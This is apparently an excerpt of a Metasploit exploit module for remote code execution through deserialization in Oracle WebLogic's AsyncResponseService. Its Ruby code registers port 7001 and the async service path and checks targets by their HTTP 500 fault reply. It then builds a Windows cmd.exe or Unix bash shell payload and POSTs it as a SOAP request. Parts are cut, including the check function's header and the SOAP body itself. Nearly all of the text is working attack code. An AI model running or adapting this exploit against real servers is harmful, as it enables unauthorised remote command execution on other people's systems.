register_options(
[
Opt::RPORT(7001),
OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
]
)
end
if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
Exploit::CheckCode::Vulnerable
elsif res && res.code != 202
vprint_status("The target returned a non-vulnerable HTTP code")
Exploit::CheckCode::Safe
elsif res.nil?
vprint_status("The target did not respond in an expected way")
Exploit::CheckCode::Unknown
else
vprint_status("The target returned HTTP code: #{res.code}")
vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
Exploit::CheckCode::Unknown
end
end
def exploit
print_status("Generating payload...")
case target.name
when 'Windows'
string0_cmd = 'cmd.exe'
string1_param = '/c'
shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
when 'Unix','Solaris'
string0_cmd = '/bin/bash'
string1_param = '-c'
shell_payload = payload.encoded
end
uri = normalize_uri(datastore['WSPATH'])
if uri.nil?
datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
end
print_status("Sending payload...")
begin
res = send_request_cgi(
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml',
'data' => soap_payload,
'headers' => {'SOAPAction' => '' }
)
rescue Errno::ENOTCONN
fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
end
if res.nil?
fail_with(Failure::Unreachable, "No response from host")
elsif res && res.code != 202
fail_with(Failure::UnexpectedReply,"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
end
end
end
Oracle weblogic server asyncresponseservice deserialization remote code execution (metasploit)